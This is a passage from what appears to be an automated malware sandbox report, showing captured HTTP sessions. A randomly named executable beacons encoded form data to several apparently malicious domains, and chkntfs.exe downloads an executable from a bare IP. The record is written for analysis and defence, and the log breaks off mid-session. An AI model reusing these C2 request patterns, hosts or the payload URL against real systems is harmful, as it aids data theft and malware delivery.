                                                  Location: http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  17 | 192.168.2.7 | 64472 | 192.250.231.28 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:31.088466883 CEST | 710 | OUT | POST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=F4YKnCft7MAFV8EmO0gzRm8KBYSb8iO242WoubOPvjLc/BRlh4Z6DVCbl8yezJLBe4EhYhxIE1A03yzNUfkH+s+69zKoDQIYuE5Ll7jpmLjMQ5xbIlFJs8PfX9Med55r1vhQIn1FUyfneeuaBaL4bwJIPHgxjCteEFRYXgipSRW7RsXcQhqRiXlOxWOiXDmtxUEhqGWNG8avOelJ/Q==
                                                  Jul 1, 2024 19:25:31.592351913 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:30 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:31.592395067 CEST | 219 | IN | Data Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  18 | 192.168.2.7 | 64473 | 192.250.231.28 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:33.618639946 CEST | 730 | OUT | POST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=F4YKnCft7MAFUc0mdkczXG8JO4Sb2COy42SouYDCvR/c/j5lztt6EVCbtcyH9pLwe4IfYkxIE1E0327NUPYE/8+4oDKqeAIYuE5Ll7nHmLLMTJhbJHtOlcOtS9MeKJ5v1vhyIidvU3bnefyaAIv/CAJGQ3hUuzUpdltBTxS0aCS7QaK+KDm98Gd11UqUAl7YzVA5nkisZL/FDMENpgYgGTTcUHIwQV27DwY5Fck=
                                                  Jul 1, 2024 19:25:34.131337881 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:33 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:34.131373882 CEST | 219 | IN | Data Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  19 | 192.168.2.7 | 64474 | 192.250.231.28 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:36.149451017 CEST | 1743 | OUT | POST /b9jt/ HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cr-pos.com
                                                  Referer: http://www.cr-pos.com/b9jt/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 46 34 59 4b 6e 43 66 74 37 4d 41 46 55 63 30 6d 64 6b 63 7a 58 47 38 4a 4f 34 53 62 32 43 4f 79 34 32 53 6f 75 59 44 43 76 52 6e 63 2f 51 42 6c 68 61 78 36 46 56 43 62 6e 38 79 61 39 70 4c 58 65 34 67 44 59 6b 30 71 45 33 4d 30 6d 6b 6a 4e 41 74 38 45 32 38 2b 34 33 54 4b 72 44 51 49 4e 75 45 70 58 6c 37 58 48 6d 4c 4c 4d 54 4c 70 62 41 31 46 4f 6a 63 50 66 58 39 4e 66 64 35 35 54 31 76 35 59 49 69 52 56 58 44 76 6e 65 2f 69 61 47 37 4c 2f 4b 41 4a 45 54 33 68 32 75 79 6f 32 64 6d 4a 6e 54 78 57 4f 61 41 53 37 63 2b 7a 32 66 43 32 67 71 57 52 61 30 6c 4b 48 4b 31 7a 36 79 32 63 6b 75 46 4c 44 64 62 66 52 41 39 55 4d 6c 47 5a 51 58 78 44 44 66 6d 49 43 54 41 66 73 62 51 4d 78 62 71 4a 54 6b 61 6b 77 49 59 63 6b 73 4e 51 2b 73 65 4a 6a 46 54 44 5a 72 4a 52 35 34 70 75 4b 45 41 4c 53 77 7a 58 57 47 53 36 72 65 65 56 71 36 77 68 39 30 76 4d 44 4d 57 46 34 4f 59 70 6f 6c 5a 48 49 49 52 33 32 33 2f 66 69 50 77 4d 30 34 62 76 70 4f 48 57 39 35 54 51 53 79 78 2b 66 41 6f 32 68 78 49 74 6b [TRUNCATED]
                                                  Jul 1, 2024 19:25:36.662798882 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:35 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:36.662818909 CEST | 219 | IN | Data Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  20 | 192.168.2.7 | 64475 | 192.250.231.28 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:38.686378002 CEST | 453 | OUT | GET /b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.cr-pos.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:39.206994057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  X-Powered-By-Plesk: PleskWin
                                                  Date: Mon, 01 Jul 2024 17:25:39 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:25:39.207015991 CEST | 219 | IN | Data Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                  Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  21 | 192.168.2.7 | 64476 | 162.0.238.43 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:52.990557909 CEST | 716 | OUT | POST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=0s2sDivS0hGKFfoeIUx1RB6rXMI7eaxXZtWI3FvXGYIxzVqbjRhJzdJVTKLEc8i8tnzpqxacSDYoKI4XWGbjSlU7m/gU7y4Kz6d9GXZRDGItdX3+cpeT+SmQJt/GHzyjFw8jMOVN/4Sr2JFNYdoUSP0Bi+EQi4HJRw+0cYuTTM0bAco2Bd631t2/26+rAjco0bC2jxPdKXlXeOumqQ==
                                                  Jul 1, 2024 19:25:53.602468014 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:53 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  22 | 192.168.2.7 | 64477 | 162.0.238.43 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:55.524468899 CEST | 736 | OUT | POST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=0s2sDivS0hGKXv4eYDl1Ax6ocsI7X6xbZtaI3HD+GuYxz0abs0NJwdJVYqLdY8i3tnOJq1acSD8oKJIXW3bgQ1UuvfgK1S4Kz6d9GXd7DHgtdGH+cIeMgCmXOt/GDzynFw92ML13/7qr2I1NZMoVbP1Km+FTsZGDbBSqFr2Qd+8fMK1Ub/2br8OEy4adXFBd2aGuuT78VgA9TcPi8uNSZwPAhQmm9QTBSwr09+s=
                                                  Jul 1, 2024 19:25:56.120687962 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:56 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  23 | 192.168.2.7 | 64478 | 162.0.238.43 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:25:58.058517933 CEST | 1749 | OUT | POST /vwgn/ HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.tufftiff.xyz
                                                  Referer: http://www.tufftiff.xyz/vwgn/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:58.759198904 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:58 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  24 | 192.168.2.7 | 64479 | 162.0.238.43 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:00.592495918 CEST | 455 | OUT | GET /vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.tufftiff.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:01.205409050 CEST | 250 | IN | HTTP/1.1 200 OK
                                                  Date: Mon, 01 Jul 2024 17:26:01 GMT
                                                  Server: Apache
                                                  Vary: Accept-Encoding
                                                  Content-Length: 76
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Ascii: 7uCWdGq25RaDV6EBInkEWlP7PsZaPPM7LLPUuQu4ZvgwyFyvrXQtztYeLZ+8X5jDpVPEvyi7eA==


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  25 | 192.168.2.7 | 64480 | 185.234.72.101 | 80 | 7640 | C:\Windows\SysWOW64\chkntfs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:05.837033033 CEST | 195 | OUT | GET /EuOdzX7Ehz6t1H3.exe HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: 185.234.72.101
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Jul 1, 2024 19:26:06.499651909 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Mon, 01 Jul 2024 17:26:06 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Thu, 27 Jun 2024 06:51:42 GMT
                                                  ETag: "aaa00-61bd9903d370d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 698880
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  26 | 192.168.2.7 | 64481 | 43.198.80.127 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:11.611465931 CEST | 719 | OUT | POST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=nuEnFl7IlS5TCwM46BdqChXhjgLM1ZriRTyr8EKwLGB6eofsX6TCKwklou+DbJkO9dqmNURd3XzUGqrbKmoHYJCigm+hLRMf/eF4eS0lHkPNFLWM2xWWoajatjsXJTLyFYOfgsaJnSk2/Y//L0BZcm+3LNH5W0BKg621RjQV+C+0tRyypf+XyxQpa2zN6XVvNFQKW0yJNh61CagLXg==
                                                  Jul 1, 2024 19:26:12.484647036 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:12 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:12.484669924 CEST | 189 | IN
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  27 | 192.168.2.7 | 64482 | 43.198.80.127 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 1, 2024 19:26:14.148614883 CEST | 739 | OUT | POST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Ascii: FTP84=nuEnFl7IlS5TQjE48mxqDBXivALM/5rmRTOr8FOgMwR6fMTsW7TCLwklgO+GUpkR9dmENWFd3XPUGrbbKx0GZZC8oG+jUhMf/eF4eSJAHkHNF6mM50iVg6jblDsXeDK5FYO9gpzUnQc2/ZP/LlBaTm+xUdHuZkNE6YjXY0hK/BCgonvQz9y7sgoSe0X7txIaPEUSbWGoSWffPIBPBU0wfoA1xH4iNy7WkKaBidU=
                                                  Jul 1, 2024 19:26:15.038206100 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:15 GMT
                                                  Connection: close
                                                  Content-Length: 1245
